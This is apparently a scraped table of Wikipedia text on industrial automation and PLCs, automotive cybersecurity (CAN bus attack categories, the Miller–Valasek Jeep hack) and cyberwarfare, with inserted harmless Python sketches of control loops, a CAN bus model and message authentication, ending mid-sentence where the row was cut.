In 1997, there were 700,000 industrial robots in use, the number has risen to 1.8M in 2017 120 In recent years, AI with robotics is also used in creating an automatic labeling solution, using robotic arms as the automatic label applicator, and AI for learning and detecting the products to be labelled. 121 Industrial automation incorporates programmable logic controllers in the manufacturing process. Programmable logic controllers (PLCs) use a processing system which allows for variation of controls of inputs and outputs using simple programming. PLCs make use of programmable memory, storing instructions and functions like logic, sequencing, timing, counting, etc. Using a logic-based language, a PLC can receive a variety of inputs and return a variety of logical outputs, the input devices being sensors and output devices being motors, valves, etc. PLCs are similar to computers, however, while computers are optimized for calculations, PLCs are optimized for control tasks and use in industrial environments. They are built so that only basic logic-based programming knowledge is needed and to handle vibrations, high temperatures, humidity, and noise. The greatest advantage PLCs offer is their flexibility. With the same basic controllers, a PLC can operate a range of different control systems. PLCs make it unnecessary to rewire a system to change the control system. This flexibility leads to a cost-effective system for complex and varied control systems. 122 PLCs can range from small "building brick" devices with tens of I O in a housing integral with the processor, to large rack-mounted modular devices with a count of thousands of I O, and which are often networked to other PLC and SCADA systems. They can be designed for multiple arrangements of digital and analog inputs and outputs (I O), extended temperature ranges, immunity to electrical noise, and resistance to vibration and impact. Programs to control machine operation are typically stored in battery-backed-up or non-volatile memory. It was from the automotive industry in the United States that the PLC was born. Before the PLC, control, sequencing, and safety interlock logic for manufacturing automobiles was mainly composed of relays, cam timers, drum sequencers, and dedicated closed-loop controllers. Since these could number in the hundreds or even thousands, the process for updating such facilities for the yearly model change-over was very time-consuming and expensive, as electricians needed to individually rewire the relays to change their operational characteristics. When digital computers became available, being general-purpose programmable devices, they were soon applied to control sequential and combinatorial logic in industrial processes. However, these early computers required specialist programmers and stringent operating environmental control for temperature, cleanliness, and power quality. To meet these challenges, the PLC was developed with several key attributes. It would tolerate the shop-floor environment, it would support discrete (bit-form) input and output in an easily extensible manner, it would not require years of training to use, and it would permit its operation to be monitored. Since many industrial processes have timescales easily addressed by millisecond response times, modern (fast, small, reliable) electronics greatly facilitate building reliable controllers, and performance could be traded off for reliability. 
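The paragraph above describes how a PLC reads inputs, solves simple logic (including counting and timing functions), and drives outputs. The sketch below is a minimal, hypothetical Python analogue of that scan cycle; the sensor, actuator and batch-size names are invented for illustration, and a real PLC would use vendor I/O modules and ladder or structured-text logic rather than this code.
import time
# Hypothetical sketch of a PLC-style scan cycle: read inputs, solve logic, write outputs.
def read_inputs(cycle):
    # Placeholder inputs: a part-present photo eye that pulses on some scans.
    return {"part_sensor": cycle % 3 == 0, "reset_button": False}
def write_outputs(outputs):
    # Placeholder outputs: in a real system these would drive a motor contactor, a lamp, etc.
    print("outputs:", outputs)
def solve_logic(inputs, state, batch_size=5):
    # Counting function: increment on the rising edge of the part sensor.
    rising_edge = inputs["part_sensor"] and not state["last_sensor"]
    state["last_sensor"] = inputs["part_sensor"]
    if inputs["reset_button"]:
        state["count"] = 0
    elif rising_edge:
        state["count"] += 1
    # Run the conveyor until the batch is complete, then light the "batch done" lamp.
    return {"conveyor_run": state["count"] < batch_size,
            "batch_done_lamp": state["count"] >= batch_size}
state = {"count": 0, "last_sensor": False}
for cycle in range(20):          # each iteration stands in for one PLC scan
    outputs = solve_logic(read_inputs(cycle), state)
    write_outputs(outputs)
    time.sleep(0.01)             # fixed pause stands in for the PLC scan time
The read/solve/write ordering mirrors the typical PLC scan; only the logic step would change from application to application.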
123 Agent-assisted automation refers to automation used by call center agents to handle customer inquiries. The key benefit of agent-assisted automation is compliance and error-proofing. Agents are sometimes not fully trained or they forget or ignore key steps in the process. The use of automation ensures that what is supposed to happen on the call actually does, every time. There are two basic types: desktop automation and automated voice solutions. Fundamentally, there are two types of control loop: open-loop control (feedforward), and closed-loop control (feedback). In open-loop control, the control action from the controller is independent of the "process output" (or "controlled process variable"). A good example of this is a central heating boiler controlled only by a timer, so that heat is applied for a constant time, regardless of the temperature of the building. The control action is the switching on off of the boiler, but the controlled variable should be the building temperature, but is not because this is open-loop control of the boiler, which does not give closed-loop control of the temperature. In closed loop control, the control action from the controller is dependent on the process output. In the case of the boiler analogy this would include a thermostat to monitor the building temperature, and thereby feed back a signal to ensure the controller maintains the building at the temperature set on the thermostat. A closed loop controller therefore has a feedback loop which ensures the controller exerts a control action to give a process output the same as the "reference input" or "set point". For this reason, closed loop controllers are also called feedback controllers. 124 The definition of a closed loop control system according to the British Standards Institution is "a control system possessing monitoring feedback, the deviation signal formed as a result of this feedback being used to control the action of a final control element in such a way as to tend to reduce the deviation to zero. 125 One of the simplest types of control is on-off control. An example is a thermostat used on household appliances which either open or close an electrical contact. (Thermostats were originally developed as true feedback-control mechanisms rather than the on-off common household appliance thermostat.) Sequence control, in which a programmed sequence of discrete operations is performed, often based on system logic that involves system states. An elevator control system is an example of sequence control. A proportional integral derivative controller (PID controller) is a control loop feedback mechanism (controller) widely used in industrial control systems. In a PID loop, the controller continuously calculates an error value e ( t ) displaystyle e(t) as the difference between a desired setpoint and a measured process variable and applies a correction based on proportional, integral, and derivative terms, respectively (sometimes denoted P, I, and D) which give their name to the controller type. The theoretical understanding and application date from the 1920s, and they are implemented in nearly all analog control systems; originally in mechanical controllers, and then using discrete electronics and latterly in industrial process computers. Sequential control may be either to a fixed sequence or to a logical one that will perform different actions depending on various system states. An example of an adjustable but otherwise fixed sequence is a timer on a lawn sprinkler. 
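The PID description above can be made concrete with a short sketch. Below is a minimal, hypothetical discrete-time PID loop in Python that regulates an imaginary first-order "boiler" temperature toward a setpoint; the gains, clamp limits and plant model are invented for illustration and are not tuned for any real process.
# Minimal discrete-time PID sketch (illustrative only; gains and plant are made up).
def pid_step(setpoint, measurement, state, kp=2.0, ki=0.5, kd=0.1, dt=1.0):
    error = setpoint - measurement                    # e(t): setpoint minus process variable
    state["integral"] += error * dt                   # integral term accumulates past error
    derivative = (error - state["prev_error"]) / dt   # derivative term reacts to the error trend
    state["prev_error"] = error
    return kp * error + ki * state["integral"] + kd * derivative
# Toy first-order plant standing in for the boiler: temperature drifts toward ambient,
# and the control output adds heat (all coefficients are invented).
def simulate(setpoint=60.0, steps=30):
    temp = 20.0
    state = {"integral": 0.0, "prev_error": 0.0}
    for t in range(steps):
        u = pid_step(setpoint, temp, state)
        u = max(0.0, min(u, 10.0))                    # clamp actuator output (heater power)
        temp += 0.1 * (20.0 - temp) + 0.5 * u         # simple heat balance
        print(f"t={t:2d}  temp={temp:5.1f}  control={u:4.1f}")
simulate()
Running the loop shows the temperature settling near the setpoint, which is the behaviour the proportional, integral and derivative terms are combined to produce.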
States refer to the various conditions that can occur in a use or sequence scenario of the system. An example is an elevator, which uses logic based on the system state to perform certain actions in response to its state and operator input. For example, if the operator presses the floor n button, the system will respond depending on whether the elevator is stopped or moving, going up or down, or if the door is open or closed, and other conditions. 127 Early development of sequential control was relay logic, by which electrical relays engage electrical contacts which either start or interrupt power to a device. Relays were first used in telegraph networks before being developed for controlling other devices, such as when starting and stopping industrial-sized electric motors or opening and closing solenoid valves. Using relays for control purposes allowed event-driven control, where actions could be triggered out of sequence, in response to external events. These were more flexible in their response than the rigid single-sequence cam timers. More complicated examples involved maintaining safe sequences for devices such as swing bridge controls, where a lock bolt needed to be disengaged before the bridge could be moved, and the lock bolt could not be released until the safety gates had already been closed. The total number of relays and cam timers can number into the hundreds or even thousands in some factories. Early programming techniques and languages were needed to make such systems manageable, one of the first being ladder logic, where diagrams of the interconnected relays resembled the rungs of a ladder. Special computers called programmable logic controllers were later designed to replace these collections of hardware with a single, more easily re-programmed unit. In a typical hard-wired motor start and stop circuit (called a control circuit) a motor is started by pushing a "Start" or "Run" button that activates a pair of electrical relays. The "lock-in" relay locks in contacts that keep the control circuit energized when the push-button is released. (The start button is a normally open contact and the stop button is a normally closed contact.) Another relay energizes a switch that powers the device that throws the motor starter switch (three sets of contacts for three-phase industrial power) in the main power circuit. Large motors use high voltage and experience high in-rush current, making speed important in making and breaking contact. This can be dangerous for personnel and property with manual switches. The "lock-in" contacts in the start circuit and the main power contacts for the motor are held engaged by their respective electromagnets until a "stop" or "off" button is pressed, which de-energizes the lock in relay. 128 Commonly interlocks are added to a control circuit. Suppose that the motor in the example is powering machinery that has a critical need for lubrication. In this case, an interlock could be added to ensure that the oil pump is running before the motor starts. Timers, limit switches, and electric eyes are other common elements in control circuits. Solenoid valves are widely used on compressed air or hydraulic fluid for powering actuators on mechanical components. While motors are used to supply continuous rotary motion, actuators are typically a better choice for intermittently creating a limited range of movement for a mechanical component, such as moving various mechanical arms, opening or closing valves, raising heavy press-rolls, applying pressure to presses. 
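The hard-wired start/stop circuit and lubrication interlock described above can be mirrored in a few lines of logic. The sketch below is a hypothetical software analogue of the seal-in ("lock-in") relay: the start button is normally open, the stop button is normally closed, and the motor output stays latched until stop is pressed or the interlock drops out. The function and signal names are invented for the example.
# Software analogue of a relay seal-in circuit with a lubrication interlock (illustrative only).
def motor_control(start_pressed, stop_pressed, oil_pump_running, motor_latched):
    # Stop button is normally closed: pressing it breaks the circuit immediately.
    if stop_pressed:
        return False
    # Interlock: the motor may only run while the oil pump is proven running.
    if not oil_pump_running:
        return False
    # Seal-in: a start pulse latches the motor on; the latch holds it after release.
    return motor_latched or start_pressed
# Walk through a short sequence of button presses.
latched = False
for start, stop, oil in [(True, False, True),    # start pressed -> motor latches on
                         (False, False, True),   # start released -> stays on (seal-in)
                         (False, False, False),  # oil pump lost -> interlock drops motor
                         (True, False, True),    # restart once lubrication is back
                         (False, True, True)]:   # stop pressed -> motor off
    latched = motor_control(start, stop, oil, latched)
    print(f"start={start} stop={stop} oil={oil} -> motor={'ON' if latched else 'OFF'}")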
Computers can perform both sequential control and feedback control, and typically a single computer will do both in an industrial application. Programmable logic controllers (PLCs) are a type of special-purpose microprocessor that replaced many hardware components such as timers and drum sequencers used in relay logic type systems. General-purpose process control computers have increasingly replaced stand-alone controllers, with a single computer able to perform the operations of hundreds of controllers. Process control computers can process data from a network of PLCs, instruments, and controllers to implement typical (such as PID) control of many individual variables or, in some cases, to implement complex control algorithms using multiple inputs and mathematical manipulations. They can also analyze data and create real-time graphical displays for operators and run reports for operators, engineers, and management. Control of an automated teller machine (ATM) is an example of an interactive process in which a computer will perform a logic-derived response to a user selection based on information retrieved from a networked database. The ATM process has similarities with other online transaction processes. The different logical responses are called scenarios. Such processes are typically designed with the aid of use cases and flowcharts, which guide the writing of the software code. The earliest feedback control mechanism was the water clock invented by Greek engineer Ctesibius (285 222 BC). |
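The ATM example above, in which a computer selects among predefined "scenarios" based on user input and system state, is essentially a state machine. The fragment below is a hypothetical, much-simplified Python sketch of that idea; the states, events and transitions are invented for illustration and do not describe any real ATM software.
# Hypothetical, simplified ATM-style state machine (states and events are invented).
TRANSITIONS = {
    ("idle", "card_inserted"): "awaiting_pin",
    ("awaiting_pin", "pin_ok"): "menu",
    ("awaiting_pin", "pin_bad"): "idle",
    ("menu", "withdraw"): "dispensing",
    ("dispensing", "cash_taken"): "idle",
}
def step(state, event):
    # Each (state, event) pair selects one "scenario"; unknown events leave the state unchanged.
    return TRANSITIONS.get((state, event), state)
state = "idle"
for event in ["card_inserted", "pin_ok", "withdraw", "cash_taken"]:
    state = step(state, event)
    print(f"{event:13s} -> {state}")
This is the kind of logic that the use cases and flowcharts mentioned above are typically translated into.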
637 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Automotive_security | Automotive security refers to the branch of computer security focused on the cyber risks related to the automotive context. The increasingly high number of ECUs in vehicles and, alongside, the implementation of multiple different means of communication from and towards the vehicle in a remote and wireless manner led to the necessity of a branch of cybersecurity dedicated to the threats associated with vehicles. Not to be confused with automotive safety. The implementation of multiple ECUs (Electronic Control Units) inside vehicles began in the early '70s thanks to the development of integrated circuits and microprocessors that made it economically feasible to produce the ECUs on a large scale. 1 Since then the number of ECUs has increased to up to 100 per vehicle. These units nowadays control almost everything in the vehicle, from simple tasks such as activating the wipers to more safety-related ones like brake-by-wire or ABS (Anti-lock Braking System). Autonomous driving is also strongly reliant on the implementation of new, complex ECUs such as the ADAS, alongside sensors (lidars and radars) and their control units. Inside the vehicle, the ECUs are connected with each other through cabled or wireless communication networks, such as CAN bus (controller area network), MOST bus (Media Oriented System Transport), FlexRay (Automotive Network Communications Protocol) or RF (radio frequency) as in many implementations of TPMSs (tire-pressure monitoring systems). Many of these ECUs require data received through these networks that arrive from various sensors to operate and use such data to modify the behavior of the vehicle (e.g., the cruise control modifies the vehicle's speed depending on signals arriving from a button usually located on the steering wheel). Since the development of cheap wireless communication technologies such as Bluetooth, LTE, Wi-Fi, RFID and similar, automotive producers and OEMs have designed ECUs that implement such technologies with the goal of improving the experience of the driver and passengers. Safety-related systems such as the OnStar 2 from General Motors, telematic units, communication between smartphones and the vehicle's speakers through Bluetooth, Android Auto 3 and Apple CarPlay. 4 Threat models of the automotive world are based on both real-world and theoretically possible attacks. Most real-world attacks aim at the safety of the people in and around the car, by modifying the cyber-physical capabilities of the vehicle (e.g., steering, braking, accelerating without requiring actions from the driver 5 6 ), while theoretical attacks have been supposed to focus also on privacy-related goals, such as obtaining GPS data on the vehicle, or capturing microphone signals and similar. 7 Regarding the attack surfaces of the vehicle, they are usually divided in long-range, short-range, and local attack surfaces: 8 LTE and DSRC can be considered long-range ones, while Bluetooth and Wi-Fi are usually considered short-range although still wireless. Finally, USB, OBD-II and all the attack surfaces that require physical access to the car are defined as local. An attacker that is able to implement the attack through a long-range surface is considered stronger and more dangerous than the one that requires physical access to the vehicle. 
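The row above describes ECUs exchanging sensor data over a shared CAN bus. The sketch below is a minimal, hypothetical Python model of that idea: frames carry an identifier and a payload, every node sees every frame, and each ECU filters by the identifiers it cares about. The IDs and signal names are invented; a real implementation would use an actual CAN stack and the vehicle's signal database rather than this toy model.
from dataclasses import dataclass
# Minimal model of CAN-style broadcast communication (IDs and signals are invented).
@dataclass
class CanFrame:
    can_id: int      # 11-bit identifier; a lower value wins arbitration (higher priority)
    data: bytes      # up to 8 bytes of payload in classical CAN
class Ecu:
    def __init__(self, name, accepted_ids):
        self.name = name
        self.accepted_ids = accepted_ids
    def on_frame(self, frame):
        # Every node receives every frame; each ECU filters by identifier.
        if frame.can_id in self.accepted_ids:
            print(f"{self.name} accepted id=0x{frame.can_id:03X} data={frame.data.hex()}")
class CanBus:
    def __init__(self):
        self.nodes = []
    def attach(self, ecu):
        self.nodes.append(ecu)
    def transmit(self, frame):
        for node in self.nodes:   # broadcast: all attached nodes see the frame
            node.on_frame(frame)
bus = CanBus()
bus.attach(Ecu("cruise_control", accepted_ids={0x100}))    # listens for wheel speed
bus.attach(Ecu("dashboard", accepted_ids={0x100, 0x200}))  # listens for speed and RPM
bus.transmit(CanFrame(can_id=0x100, data=(1200).to_bytes(2, "big")))  # e.g. a speed signal
The broadcast behaviour modelled here is also what makes sniffing and spoofing on CAN straightforward, as the following text explains.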
In 2015, Miller and Valasek proved that attacks on vehicles already on the market are possible, managing to disrupt the driving of a Jeep Cherokee while connecting to it remotely through wireless communication. 9 10 The most common network used in vehicles, and the one that is mainly used for safety-related communication, is CAN, due to its real-time properties, simplicity, and cheapness. For this reason the majority of real-world attacks have been implemented against ECUs connected through this type of network. 5 6 9 10 The majority of attacks demonstrated either against actual vehicles or in testbeds fall into one or more of the following categories: Sniffing in the computer security field generally refers to the possibility of intercepting and logging packets, or more generally data, from a network. In the case of CAN, since it is a bus network, every node listens to all communication on the network. It is useful for the attacker to read data to learn the behavior of the other nodes of the network before implementing the actual attack. Usually, the final goal of the attacker is not to simply sniff the data on CAN, since the packets passing on this type of network are not usually valuable just to read. 8 Denial of service (DoS) in information security is usually described as an attack that has the objective of making a machine or a network unavailable. DoS attacks against ECUs connected to CAN buses can be done both against the network, by abusing the arbitration protocol used by CAN to always win the arbitration, and against a single ECU, by abusing the error handling protocol of CAN. 11 In this second case the attacker flags the messages of the victim as faulty to convince the victim that it is broken, so that it shuts itself off from the network. 11 Spoofing attacks comprise all cases in which an attacker, by falsifying data, sends messages pretending to be another node of the network. In automotive security, spoofing attacks are usually divided into masquerade and replay attacks. Replay attacks are defined as all those where the attacker pretends to be the victim and sends sniffed data that the victim sent in a previous iteration of authentication. Masquerade attacks are, on the contrary, spoofing attacks where the data payload has been created by the attacker. 12 Security researchers Charlie Miller and Chris Valasek have successfully demonstrated remote access to a wide variety of vehicle controls using a Jeep Cherokee as the target. They were able to control the radio, environmental controls, windshield wipers, and certain engine and brake functions. 10 The method used to hack the system was the insertion of a pre-programmed chip into the controller area network (CAN) bus. By inserting this chip into the CAN bus, they were able to send arbitrary messages to the bus. Miller has also pointed out the danger of the CAN bus: because it broadcasts every message, traffic can be captured by attackers anywhere on the network. The control of the vehicle was all done remotely, manipulating the system without any physical interaction. Miller states that he could control any of some 1.4 million vehicles in the United States regardless of location or distance; the only thing needed to gain access is for someone to turn on the vehicle. 13 The work by Miller and Valasek replicated earlier work completed and published by academics in 2010 and 2011 on a different vehicle. 
14 The earlier work demonstrated the ability to compromise a vehicle remotely, over multiple wireless channels (including cellular), and the ability to remotely control critical components on the vehicle post-compromise, including the telematics unit and the car's brakes. While the earlier academic work was publicly visible, both in peer-reviewed scholarly publications 15 16 and in the press, 17 the Miller and Valesek work received even greater public visibility. The increasing complexity of devices and networks in the automotive context requires the application of security measures to limit the capabilities of a potential attacker. Since the early 2000 many different countermeasures have been proposed and, in some cases, applied. Following, a list of the most common security measures: 8 In June 2020, the United Nations Economic Commission for Europe (UNECE) World Forum for Harmonization of Vehicle Regulations released two new regulations, R155 and R156, establishing "clear performance and audit requirements for car manufacturers" in terms of automotive cybersecurity and software updates. 21 |
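The countermeasures referred to above commonly include message authentication, in which a sender appends a freshness counter and a truncated MAC so that receivers can reject replayed or forged frames. The sketch below is a hypothetical illustration of that idea using Python's standard hmac module; the key handling, counter width and truncation length are invented for the example and are not taken from any specific automotive standard.
import hmac, hashlib
KEY = b"demo-shared-key"   # hypothetical pre-shared key between sender and receiver
def protect(payload: bytes, counter: int) -> bytes:
    # Append a 2-byte freshness counter and a 4-byte truncated HMAC to the payload.
    fresh = counter.to_bytes(2, "big")
    tag = hmac.new(KEY, payload + fresh, hashlib.sha256).digest()[:4]
    return payload + fresh + tag
def verify(frame: bytes, last_counter: int):
    payload, fresh, tag = frame[:-6], frame[-6:-4], frame[-4:]
    counter = int.from_bytes(fresh, "big")
    expected = hmac.new(KEY, payload + fresh, hashlib.sha256).digest()[:4]
    if not hmac.compare_digest(tag, expected):
        return None, last_counter    # masquerade attempt: payload or tag was forged
    if counter <= last_counter:
        return None, last_counter    # replay attempt: counter is not fresh
    return payload, counter
frame = protect(b"\x01\x2c", counter=7)   # e.g. an invented speed value
print(verify(frame, last_counter=6))       # accepted: tag valid and counter fresh
print(verify(frame, last_counter=7))       # rejected as a replay of an old counter
In practice the tag and counter must fit inside the frame payload, which is why truncated MACs and short freshness values are the usual compromise on bandwidth-limited buses.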
638 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cyberwarfare | Cyberwarfare is the use of cyber attacks against an enemy state, causing comparable harm to actual warfare and or disrupting vital computer systems. 1 Some intended outcomes could be espionage, sabotage, propaganda, manipulation or economic warfare. There is significant debate among experts regarding the definition of cyberwarfare, and even if such a thing exists. 2 One view is that the term is a misnomer since no cyber attacks to date could be described as a war. 3 An alternative view is that it is a suitable label for cyber attacks which cause physical damage to people and objects in the real world. 4 Many countries, including the United States, United Kingdom, Russia, China, Israel, Iran, and North Korea, 5 6 7 8 have active cyber capabilities for offensive and defensive operations. As states explore the use of cyber operations and combine capabilities, the likelihood of physical confrontation and violence playing out as a result of, or part of, a cyber operation is increased. However, meeting the scale and protracted nature of war is unlikely, thus ambiguity remains. 9 The first instance of kinetic military action used in response to a cyber-attack resulting in the loss of human life was observed on 5 May 2019, when the Israel Defense Forces targeted and destroyed a building associated with an ongoing cyber-attack. 10 11 There is ongoing debate over how cyberwarfare should be defined and no absolute definition is widely agreed upon. 9 12 While the majority of scholars, militaries, and governments use definitions that refer to state and state-sponsored actors, 9 13 14 other definitions may include non-state actors, such as terrorist groups, companies, political or ideological extremist groups, hacktivists, and transnational criminal organizations depending on the context of the work. 15 16 Examples of definitions proposed by experts in the field are as follows. 'Cyberwarfare' is used in a broad context to denote interstate use of technological force within computer networks in which information is stored, shared, or communicated online. 9 Raymond Charles Parks and David P. Duggan focused on analyzing cyberwarfare in terms of computer networks and pointed out that "Cyberwarfare is a combination of computer network attack and defense and special technical operations. 17 According to this perspective, the notion of cyber warfare brings a new paradigm into military doctrine. Paulo Shakarian and colleagues put forward the following definition of "cyber war" in 2013, drawing on Clausewitz's definition of war: "War is the continuation of politics by other means": 13 Cyber war is an extension of policy by actions taken in cyber space by state or nonstate actors that constitute a serious threat to a nation's security or are conducted in response to a perceived threat against a nation's security. Taddeo offered the following definition in 2012: The warfare grounded on certain uses of ICTs within an offensive or defensive military strategy endorsed by a state and aiming at the immediate disruption or control of the enemy's resources, and which is waged within the informational environment, with agents and targets ranging both on the physical and non-physical domains and whose level of violence may vary upon circumstances. 18 Robinson et al. 
proposed in 2015 that the intent of the attacker dictates whether an attack is warfare or not, defining cyber warfare as "the use of cyber attacks with a warfare-like intent. 12 In 2010, the former US National Coordinator for Security, Infrastructure Protection and Counter-terrorism, Richard A. Clarke, defined cyberwarfare as "actions by a nation-state to penetrate another nation's computers or networks for the purposes of causing damage or disruption". 14 The target's own cyber-physical infrastructure may be used by the adversary in case of a cyber conflict, thus weaponizing it. 19 There is debate on whether the term "cyber warfare" is accurate. In 2012, Eugene Kaspersky, founder of Kaspersky Lab, concluded that "cyberterrorism" is a more accurate term than "cyberwar. He states that "with today's attacks, you are clueless about who did it or when they will strike again. It's not cyber-war, but cyberterrorism. 20 Howard Schmidt, former Cyber Security Coordinator in the Obama administration, said that "there is no cyberwar... I think that is a terrible metaphor and I think that is a terrible concept. There are no winners in that environment. 21 Some experts take issue with the possible consequences linked to the warfare goal. In 2011, Ron Deibert, of Canada's Citizen Lab, warned of a "militarization of cyberspace", as militaristic responses may not be appropriate. 22 However, to date, even serious cyber-attacks that have disrupted large parts of a nation's electrical grid (230,000 customers, Ukraine, 2015) or affected access to medical care, thus endangering life (UK National Health Service, WannaCry, 2017) have not led to military action. 23 In 2017, Oxford academic Lucas Kello proposed a new term, "Unpeace", to denote highly damaging cyber actions whose non-violent effects do not rise to the level of traditional war. Such actions are neither warlike nor peace-like. Although they are non-violent, and thus not acts of war, their damaging effects on the economy and society may be greater than those of some armed attacks. 24 25 This term is closely related to the concept of the "grey zone", which came to prominence in 2017, describing hostile actions that fall below the traditional threshold of war. 26 But as Kello explained, technological unpeace differs from the grey zone as the term is commonly used in that unpeace by definition is never overtly violent or fatal, whereas some grey-zone actions are violent, even if they are not acts of war. 27 The term "cyberwarfare" is distinct from the term "cyber war". Cyberwarfare includes techniques, tactics and procedures that may be involved in a cyber war, but the term does not imply scale, protraction or violence, which are typically associated with the term "war", which inherently refers to a large-scale action, typically over a protracted period of time, and may include objectives seeking to utilize violence or the aim to kill. 9 A cyber war could accurately describe a protracted period of back-and-forth cyber attacks (including in combination with traditional military action) between warring states. To date, no such action is known to have occurred. Instead, armed forces have responded with tit-for-tat military cyber actions. For example, in June 2019, the United States launched a cyber attack against Iranian weapons systems in retaliation to the shooting down of a US drone in the Strait of Hormuz. 28 29 In addition to retaliatory digital attacks, countries can respond to cyber attacks with cyber sanctions. 
Sometimes, it is not easy to detect the attacker, but suspicions may focus on a particular country or group of countries. In these cases, unilateral and multilateral economic sanctions can be used instead of cyberwarfare. For example, the United States has frequently imposed economic sanctions related to cyber attacks. Two Executive Orders issued during the Obama administration, EO 13694 of 2015 30 and EO 13757 of 2016, 31 32 specifically focused on the implementation of the cyber sanctions. Subsequent US presidents have issued similar Executive Orders. The US Congress has also imposed cyber sanctions in response to cyberwarfare. For example, the Iran Cyber Sanctions Act of 2016 imposes sanctions on specific individuals responsible for cyber attacks. 33 Cyber warfare can present a multitude of threats towards a nation. At the most basic level, cyber attacks can be used to support traditional warfare. For example, tampering with the operation of air defenses via cyber means in order to facilitate an air attack. 34 Aside from these "hard" threats, cyber warfare can also contribute towards "soft" threats such as espionage and propaganda. Eugene Kaspersky, founder of Kaspersky Lab, equates large-scale cyber weapons, such as Flame and NetTraveler which his company discovered, to biological weapons, claiming that in an interconnected world, they have the potential to be equally destructive. 20 35 Traditional espionage is not an act of war, nor is cyber-espionage, and both are generally assumed to be ongoing between major powers. 36 Despite this assumption, some incidents can cause serious tensions between nations, and are often described as "attacks". For example: 37 Out of all cyber attacks, 25% of them are espionage based. 45 Computers and satellites that coordinate other activities are vulnerable components of a system and could lead to the disruption of equipment. Compromise of military systems, such as C4ISTAR components that are responsible for orders and communications could lead to their interception or malicious replacement. Power, water, fuel, communications, and transportation infrastructure all may be vulnerable to disruption. According to Clarke, the civilian realm is also at risk, noting that the security breaches have already gone beyond stolen credit card numbers, and that potential targets can also include the electric power grid, trains, or the stock market. 46 In mid-July 2010, security experts discovered a malicious software program called Stuxnet that had infiltrated factory computers and had spread to plants around the world. It is considered "the first attack on critical industrial infrastructure that sits at the foundation of modern economies, notes The New York Times. 47 Stuxnet, while extremely effective in delaying Iran's nuclear program for the development of nuclear weaponry, came at a high cost. For the first time, it became clear that not only could cyber weapons be defensive but they could be offensive. The large decentralization and scale of cyberspace makes it extremely difficult to direct from a policy perspective. Non-state actors can play as large a part in the cyberwar space as state actors, which leads to dangerous, sometimes disastrous, consequences. Small groups of highly skilled malware developers are able to as effectively impact global politics and cyber warfare as large governmental agencies. A major aspect of this ability lies in the willingness of these groups to share their exploits and developments on the web as a form of arms proliferation. 
This allows lesser hackers to become more proficient in creating the large scale attacks that once only a small handful were skillful enough to manage. In addition, thriving black markets for these kinds of cyber weapons are buying and selling these cyber capabilities to the highest bidder without regard for consequences. 48 49 In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS attacks often leverage internet-connected devices with vulnerable security measures to carry out these large-scale attacks. 50 DoS attacks may not be limited to computer-based methods, as strategic physical attacks against infrastructure can be just as devastating. For example, cutting undersea communication cables may severely cripple some regions and countries with regards to their information warfare ability. 51 The federal government of the United States admits that the electric power grid is susceptible to cyberwarfare. 52 53 The United States Department of Homeland Security works with industries to identify vulnerabilities and to help industries enhance the security of control system networks. The federal government is also working to ensure that security is built in as the next generation of "smart grid" networks are developed. 54 In April 2009, reports surfaced that China and Russia had infiltrated the U.S. electrical grid and left behind software programs that could be used to disrupt the system, according to current and former national security officials. 55 The North American Electric Reliability Corporation (NERC) has issued a public notice that warns that the electrical grid is not adequately protected from cyber attack. 56 China denies intruding into the U.S. electrical grid. 57 One countermeasure would be to disconnect the power grid from the Internet and run the net with droop speed control only. 58 Massive power outages caused by a cyber attack could disrupt the economy, distract from a simultaneous military attack, or create a national trauma. 59 Iranian hackers, possibly Iranian Cyber Army pushed a massive power outage for 12 hours in 44 of 81 provinces of Turkey, impacting 40 million people. Istanbul and Ankara were among the places suffering blackout. 60 Howard Schmidt, former Cyber-Security Coordinator of the US, commented on those possibilities: 21 It's possible that hackers have gotten into administrative computer systems of utility companies, but says those aren't linked to the equipment controlling the grid, at least not in developed countries. Schmidt has never heard that the grid itself has been hacked. In June 2019, Russia said that its electrical grid has been under cyber-attack by the United States. The New York Times reported that American hackers from the United States Cyber Command planted malware potentially capable of disrupting the Russian electrical grid. 61 Cyber propaganda is an effort to control information in whatever form it takes, and influence public opinion. 62 It is a form of psychological warfare, except it uses social media, fake news websites and other digital means. 
63 In 2018, Sir Nicholas Carter, Chief of the General Staff of the British Army stated that this kind of attack from actors such as Russia "is a form of system warfare that seeks to de-legitimize the political and social system on which our military strength is based". 64 Jowell and O'Donnell (2006) state that "propaganda is the deliberate, systematic attempt to shape perceptions, manipulate cognitions, and direct behavior to achieve a response that furthers the desired intent of the propagandist" (p. 7). The internet is the most important means of communication today. People can convey their messages quickly across to a huge audience, and this can open a window for evil. Terrorist organizations can exploit this and may use this medium to brainwash people. It has been suggested that restricted media coverage of terrorist attacks would in turn decrease the number of terrorist attacks that occur afterwards. 65 In 2017, the WannaCry and Petya (NotPetya) cyber attacks, masquerading as ransomware, caused large-scale disruptions in Ukraine as well as to the U.K.'s National Health Service, pharmaceutical giant Merck, Maersk shipping company and other organizations around the world. 66 67 68 These attacks are also categorized as cybercrimes, specifically financial crime because they negatively affect a company or group. 69 The idea of a "cyber Pearl Harbor" has been debated by scholars, drawing an analogy to the historical act of war. 70 71 Others have used "cyber 9 11" to draw attention to the nontraditional, asymmetric, or irregular aspect of cyber action against a state. 72 73 There are a number of reasons nations undertake offensive cyber operations. Sandro Gaycken de , a cyber security expert and adviser to NATO, advocates that states take cyber warfare seriously as they are viewed as an attractive activity by many nations, in times of war and peace. Offensive cyber operations offer a large variety of cheap and risk-free options to weaken other countries and strengthen their own positions. Considered from a long-term, geostrategic perspective, cyber offensive operations can cripple whole economies, change political views, agitate conflicts within or among states, reduce their military efficiency and equalize the capacities of high-tech nations to that of low-tech nations, and use access to their critical infrastructures to blackmail them. 74 With the emergence of cyber as a substantial threat to national and global security, cyber war, warfare and or attacks also became a domain of interest and purpose for the military. 75 In the U.S., General Keith B. Alexander, first head of USCYBERCOM, told the Senate Armed Services Committee that computer network warfare is evolving so rapidly that there is a "mismatch between our technical capabilities to conduct operations and the governing laws and policies. Cyber Command is the newest global combatant and its sole mission is cyberspace, outside the traditional battlefields of land, sea, air and space. It will attempt to find and, when necessary, neutralize cyberattacks and to defend military computer networks. 76 Alexander sketched out the broad battlefield envisioned for the computer warfare command, listing the kind of targets that his new headquarters could be ordered to attack, including "traditional battlefield prizes command-and-control systems at 